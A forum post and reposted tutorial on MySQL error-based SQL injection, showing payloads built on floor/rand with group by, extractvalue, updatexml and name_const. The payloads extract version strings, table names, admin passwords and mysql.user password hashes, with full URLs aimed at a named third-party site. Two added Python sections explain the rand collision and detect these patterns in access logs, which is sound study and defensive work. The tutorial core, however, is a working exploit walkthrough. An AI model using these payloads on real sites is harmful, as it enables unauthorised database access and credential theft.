
MySQL error-based injection: three methods using floor, ExtractValue and UpdateXml

Posted by the original poster on 2015-11-11 19:03:37

1. Error via floor

The following payloads can be used:

and (select 1 from (select count(*),concat(version(),floor(rand(0)*2))x from information_schema.tables group by x)a);

and (select count(*) from (select 1 union select null union select !1)x group by concat((select table_name from information_schema.tables limit 1),floor(rand(0)*2)));

Example: first run a normal query:

mysql> select * from article where id = 1;
+----+-------+---------+
| id | title | content |
+----+-------+---------+
|  1 | test  | do it   |
+----+-------+---------+

If the id parameter is injectable, the following statement triggers the error.

mysql> select * from article where id = 1 and (select 1 from (select count(*),concat(version(),floor(rand(0)*2))x from information_schema.tables group by x)a);
ERROR 1062 (23000): Duplicate entry '5.1.33-community-log1' for key 'group_key'

The MySQL version is leaked in the error message. To retrieve other data, replace the version() call with the subquery whose result you want returned.
For example, to query the administrator's username and password:

Method1:

mysql> select * from article where id = 1 and (select 1 from (select count(*),concat((select pass from admin where id=1),floor(rand(0)*2))x from information_schema.tables group by x)a);
ERROR 1062 (23000): Duplicate entry 'admin8881' for key 'group_key'

Method2:

mysql> select * from article where id = 1 and (select count(*) from (select 1 union select null union select !1)x group by concat((select pass from admin limit 1),floor(rand(0)*2)));
ERROR 1062 (23000): Duplicate entry 'admin8881' for key 'group_key'
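The following Python model is added here and is not part of the original post. It shows why the floor() payload produces the duplicate-key error: MySqlRand reproduces MySQL's RAND(seed) generator (the two-seed linear congruential generator with modulus 0x3FFFFFFF used by the server), and simulate_group_by is a simplified model, stated here as an assumption rather than a port of the server code, of how GROUP BY fills its temporary table: the key expression is evaluated once to look the group up and again when a new group is inserted. With rand(0) the sequence floor(rand(0)*2) begins 0, 1, 1, 0, 1, 1, so the collision appears on the third row; that is why Method2 above unions exactly three rows, and why the error message echoes whatever was concatenated in front of the digit. From the defender's side the leak exists only because the raw "Duplicate entry" message reaches the client. The class and function names are mine.

```python
# Added example: model of the floor(rand(0)*2) ... group by collision.
# MySqlRand follows MySQL's RAND(seed) generator; simulate_group_by is a
# simplified, assumed model of the GROUP BY temp-table insert, not server code.

MAX_VALUE = 0x3FFFFFFF  # modulus of MySQL's two-seed generator


class MySqlRand:
    """Reproduces the RAND(seed) sequence MySQL produces for an integer seed."""

    def __init__(self, seed: int) -> None:
        self.seed1 = (seed * 0x10001 + 55555555) % MAX_VALUE
        self.seed2 = (seed * 0x10000001) % MAX_VALUE

    def next(self) -> float:
        self.seed1 = (self.seed1 * 3 + self.seed2) % MAX_VALUE
        self.seed2 = (self.seed1 + self.seed2 + 33) % MAX_VALUE
        return self.seed1 / MAX_VALUE


def floor_rand_sequence(seed: int, n: int) -> list:
    """The first n values of floor(rand(seed)*2)."""
    rng = MySqlRand(seed)
    return [int(rng.next() * 2) for _ in range(n)]


def simulate_group_by(prefix: str, n_rows: int, seed: int = 0):
    """
    Model of
        select count(*), concat(prefix, floor(rand(seed)*2)) x
        from <a table with n_rows rows> group by x
    Returns ("ok", {key: count}) or ("error", message).
    """
    rng = MySqlRand(seed)
    groups = {}
    for _ in range(n_rows):
        key = prefix + str(int(rng.next() * 2))  # evaluated to find the group
        if key in groups:
            groups[key] += 1
            continue
        # Unknown group: the key is evaluated again when the row is inserted,
        # so the inserted key may differ from the one just looked up.
        key = prefix + str(int(rng.next() * 2))
        if key in groups:
            return ("error", "Duplicate entry '%s' for key 'group_key'" % key)
        groups[key] = 1
    return ("ok", groups)


if __name__ == "__main__":
    print(floor_rand_sequence(0, 8))
    for rows in (1, 2, 3):
        print(rows, simulate_group_by("5.1.33-community-log", rows))
```

With one or two rows the query succeeds; with three it fails with exactly the message shown above, the first row inserting key "...1", the second row counting against it, and the third row looking up "...0" but inserting "...1" again.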

2. ExtractValue

Test statement:

and extractvalue(1, concat(0x5c, (select table_name from information_schema.tables limit 1)));

Actual test:

mysql> select * from article where id = 1 and extractvalue(1, concat(0x5c,(select pass from admin limit 1)));
ERROR 1105 (HY000): XPATH syntax error: '\admin888'

3. UpdateXml

Test statement:

and 1=(updatexml(1,concat(0x3a,(select user())),1))

Actual test:

mysql> select * from article where id = 1 and 1=(updatexml(1,concat(0x3a,(select user())),1));
ERROR 1105 (HY000): XPATH syntax error: ':root@localhost'


Additional collected examples:

http://www.baido.hk/qcwh/content/detail.php?id=330&sid=19&cid=261 and exists(select*from (select*from(select name_const(@@version,0))a join (select name_const(@@version,0))b)c)

Error: Duplicate column name '5.0.27-community-nt'

http://www.baido.hk/qcwh/content/detail.php?id=330&sid=19&cid=261 and exists(select*from (select*from(select name_const((select concat(user,password) from mysql.user limit 0,1),0))a join (select name_const((select concat(user,password) from mysql.user limit 0,1),0))b)c)

Error: Duplicate column name 'root*B7B1A4F45D9E638FAEB750F0A99935634CFF6C82'
$ X& v0 M6 _, Y" r& V  t  Y6 Q6 [
Error-based injection on newer MySQL versions: injection using NAME_CONST

It's been a while since I've made an SQL Injection tutorial, so I thought I should make a new tutorial using the method name_const. There are not many papers documenting this method, so it feels kind of good to be the one to make a guide for it.

Related information

NAME_CONST was added in MySQL 5.0.12, so it won't work on anything less than that.

Code:
NAME_CONST(DATA, VALUE)

Returns the given value. When used to produce a result set column, NAME_CONST() causes the column to have the given name. The arguments should be constants.

SELECT NAME_CONST('TEST', 1)

|---------------|
|     TEST      |
|               |
|---------------|
|       1       |
|               |
|---------------|

http://dev.mysql.com/doc/refman/5.0/en/m...name-const

Intro to MySQL Variables

Once you've got your vulnerable site, let's try getting some MySQL system variables using NAME_CONST.

Code:
http://www.baido.hk/qcwh/content ... ;sid=19&cid=261

Code:
and+1=(select+*+from+(select+NAME_CONST(VAR,1),NAME_CONST(VAR,1))+as+x)--

VAR = Your MySQL variable.
MySQL 5.1.3 Server System Variables

Let's try it out on my site..

Code:
http://www.baido.hk/qcwh/content/detail.php?id=330&sid=19&cid=261+and+1=(select+*+from+(select+NAME_CONST(version(),1),NAME_CONST(version(),1))+as+x)--

Error: Duplicate column name '5.0.27-community-nt'

Now I've tried a couple of sites, and I was getting invalid calls to NAME_CONST trying to extract data. Nothing was wrong with my syntax, it just wouldn't work there. Luckily, they work here so let's get this going again...
Data Extraction

Code:
+and+1=(select+*+from+(select+NAME_CONST((select+DATA+limit+0,1),1),NAME_CONST((select+DATA+limit+0,1),1))+as+x)--

We should get a duplicate column 1 error...

Code:
http://www.baido.hk/qcwh/content ... &cid=261+and+1=(select+*+from+(select+NAME_CONST((select+1+limit+0,1),1),NAME_CONST((select+1+limit+0,1),1))+as+x)--

Error: Duplicate column name '1'


Now let's get the tables out this bitch..

Code:
+and+1=(select+*+from+(select+NAME_CONST((select+table_name+from+information_schema.tables+where+table_schema=database()+limit+0,1),1),NAME_CONST((select+table_name+from+information_schema.tables+where+table_schema=database()+limit+0,1),1))+as+x)--
Let's see if it works here; if it does, we can go on and finish the job.

Code:
http://www.baido.hk/qcwh/content ... &cid=261+and+1=(select+*+from+(select+NAME_CONST((select+table_name+from+information_schema.tables+where+table_schema=database()+limit+0,1),1),NAME_CONST((select+table_name+from+information_schema.tables+where+table_schema=database()+limit+0,1),1))+as+x)--

Error: Duplicate column name 'com_admanage'

Now I'm going to be lazy and use mysql.user as an example, just for the sake of time.

Let's get the columns out of the user table..

Code:
+and+1=(select+*+from+(select+NAME_CONST((select+column_name+from+information_schema.columns+where+table_name=0xHEX_OF_TABLENAME+limit+0,1),1),NAME_CONST((select+column_name+from+information_schema.columns+where+table_name=0xHEX_OF_TABLENAME+limit+0,1),1))+as+x)--
So mine looks like this, and I get the duplicate column name 'Host'.

Code:
http://www.baido.hk/qcwh/content ... &cid=261+and+1=(select+*+from+(select+NAME_CONST((select+column_name+from+information_schema.columns+where+table_schema=0x6d7973716c+and+table_name=0x75736572+limit+0,1),1),NAME_CONST((select+column_name+from+information_schema.columns+where+table_schema=0x6d7973716c+and+table_name=0x75736572+limit+0,1),1))+as+x)--

Error: Duplicate column name 'Host'
Woot, time to finish this bitch off.

Code:
+and+1=(select+*+from+(select+NAME_CONST((select+concat_ws(0x207e20,COLUMN1,COLUMN2)+from+TABLENAME+limit+0,1),1),NAME_CONST((select+concat_ws(0x207e20,COLUMN1,COLUMN2)+from+TABLENAME+limit+0,1),1))+as+x)--
So mine looks like this...

Code:
http://www.baido.hk/qcwh/content/detail.php?id=330&sid=19&cid=261+and+1=(select+*+from+(select+NAME_CONST((select+concat_ws(0x207e20,User,Password)+from+mysql.user+limit+0,1),1),NAME_CONST((select+concat_ws(0x207e20,User,Password)+from+mysql.user+limit+0,1),1))+as+x)--

Error: Duplicate column name 'root ~ *B7B1A4F45D9E638FAEB750F0A99935634CFF6C82'


And there we have it, thanks for reading.
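As an added defensive example, not taken from the original post or the tutorial quoted in it, the following Python scans web-server access-log lines and response bodies for the four error-based patterns shown in this thread: floor(rand()*2) combined with group by, extractvalue(), updatexml() and the name_const() duplicate-column trick, plus the verbose MySQL error strings ("Duplicate entry ... for key 'group_key'", "XPATH syntax error", "Duplicate column name") that carry the data back to the client. The log lines, the client addresses and the function names are constructed for this example; request targets are URL-decoded before matching because the tutorial above encodes spaces as "+".

```python
# Added example: detection of the error-based injection patterns from the
# thread in access logs and response bodies. Sample log lines, addresses and
# function names are constructed for this example.
import re
from urllib.parse import unquote_plus

# Request-side signatures for the four techniques discussed in the thread.
REQUEST_SIGNATURES = {
    "floor_rand_groupby": re.compile(
        r"floor\s*\(\s*rand\s*\(.*?\bgroup\s+by\b", re.I | re.S),
    "extractvalue": re.compile(r"\bextractvalue\s*\(", re.I),
    "updatexml": re.compile(r"\bupdatexml\s*\(", re.I),
    "name_const": re.compile(r"\bname_const\s*\(", re.I),
}

# Response-side signatures: the verbose MySQL errors that leak query results.
RESPONSE_SIGNATURES = {
    "duplicate_entry_group_key": re.compile(
        r"Duplicate entry '[^']*' for key 'group_key'"),
    "xpath_syntax_error": re.compile(r"XPATH syntax error: '[^']*'"),
    "duplicate_column_name": re.compile(r"Duplicate column name '[^']*'"),
}

# Combined log format as written by Apache/nginx.
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] '
    r'"(?P<method>[A-Z]+) (?P<target>\S+) [^"]*" (?P<status>\d{3})')

# Constructed sample lines: two error-based probes and one normal request.
SAMPLE_LOG = [
    '203.0.113.7 - - [11/Nov/2015:19:03:37 +0800] "GET /detail.php?id=330+and+1='
    '(select+*+from+(select+NAME_CONST(version(),1),NAME_CONST(version(),1))+as+x)--'
    ' HTTP/1.1" 500 612 "-" "Mozilla/5.0"',
    '203.0.113.7 - - [11/Nov/2015:19:04:02 +0800] "GET /detail.php?id=1%20and%20'
    'extractvalue(1,concat(0x5c,(select%20user()))) HTTP/1.1" 500 598 "-" "Mozilla/5.0"',
    '198.51.100.2 - - [11/Nov/2015:19:04:15 +0800] "GET /detail.php?id=330&sid=19&cid=261'
    ' HTTP/1.1" 200 2048 "-" "Mozilla/5.0"',
]


def scan_request(raw_target: str) -> list:
    """Names of request signatures found in a URL-decoded request target."""
    decoded = unquote_plus(raw_target)
    return [name for name, rx in REQUEST_SIGNATURES.items() if rx.search(decoded)]


def scan_response(body: str) -> list:
    """Names of leaked-MySQL-error signatures found in a response body."""
    return [name for name, rx in RESPONSE_SIGNATURES.items() if rx.search(body)]


def scan_access_log(lines) -> list:
    """One finding per log line whose request target matches a signature."""
    findings = []
    for line in lines:
        m = LOG_RE.match(line)
        if m is None:
            continue  # not a combined-format line; skip rather than guess
        hits = scan_request(m.group("target"))
        if hits:
            findings.append({
                "ip": m.group("ip"),
                "target": m.group("target"),
                "status": int(m.group("status")),
                "signatures": hits,
            })
    return findings


if __name__ == "__main__":
    for finding in scan_access_log(SAMPLE_LOG):
        print(finding)
    print(scan_response("ERROR 1105 (HY000): XPATH syntax error: ':root@localhost'"))
```

A request-signature match is a strong indicator on its own; a 500 status together with a leaked MySQL error in the body confirms that the application returns raw database errors, which is the condition every technique in this thread depends on. The fixes are independent of detection: bind the id value as a query parameter so it is never parsed as SQL, and return a generic error page instead of the driver's message.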